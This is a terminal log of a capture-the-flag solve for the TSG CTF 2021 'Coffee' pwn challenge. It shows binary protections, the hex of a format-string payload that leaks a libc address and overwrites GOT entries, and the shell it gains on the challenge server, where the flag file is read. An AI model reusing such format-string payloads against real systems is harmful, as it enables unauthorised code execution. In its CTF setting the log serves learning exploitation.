mito@ubuntu:~/CTF/TSG_CTF_2021/Pwn_Coffee/coffee$ python3 solve.py r
[*] '/home/mito/CTF/TSG_CTF_2021/Pwn_Coffee/coffee/coffee'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 34.146.101.4 on port 30002: Done
[*] '/home/mito/CTF/TSG_CTF_2021/Pwn_Coffee/coffee/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    
DEBUG] Sent 0x39 bytes:
    00000000  25 32 39 24  70 2d 25 34  37 32 37 63  25 31 30 24  │%29$│p-%4│727c│%10$│
    00000010  68 6e 25 36  30 38 35 38  63 25 31 31  24 68 6e 2d  │hn%6│0858│c%11│$hn-│
    00000020  18 40 40 00  00 00 00 00  1a 40 40 00  00 00 00 00  │·@@·│····│·@@·│····│
    00000030  b0 10 40 00  00 00 00 00  0a                        │··@·│····│·│
    00000039
        
libc_leak = 0x7f21fb2f70b3
libc_base = 0x7f21fb2d0000
[*] Switching to interactive mode
                                                                                                                

$ id
uid=999(user) gid=999(user) groups=999(user)
$ ls -l
total 28
-r-xr-xr-x 1 root user 16824 Oct  2 04:02 coffee
-r--r--r-- 1 root user    29 Oct  2 04:02 flag-dcf095f41e7bf00fa7e7cf7ef2ce9083
-r-xr-xr-x 1 root user    86 Oct  2 04:02 start.sh
$ cat flag*
TSGCTF{Uhouho_gori_gori_pwn}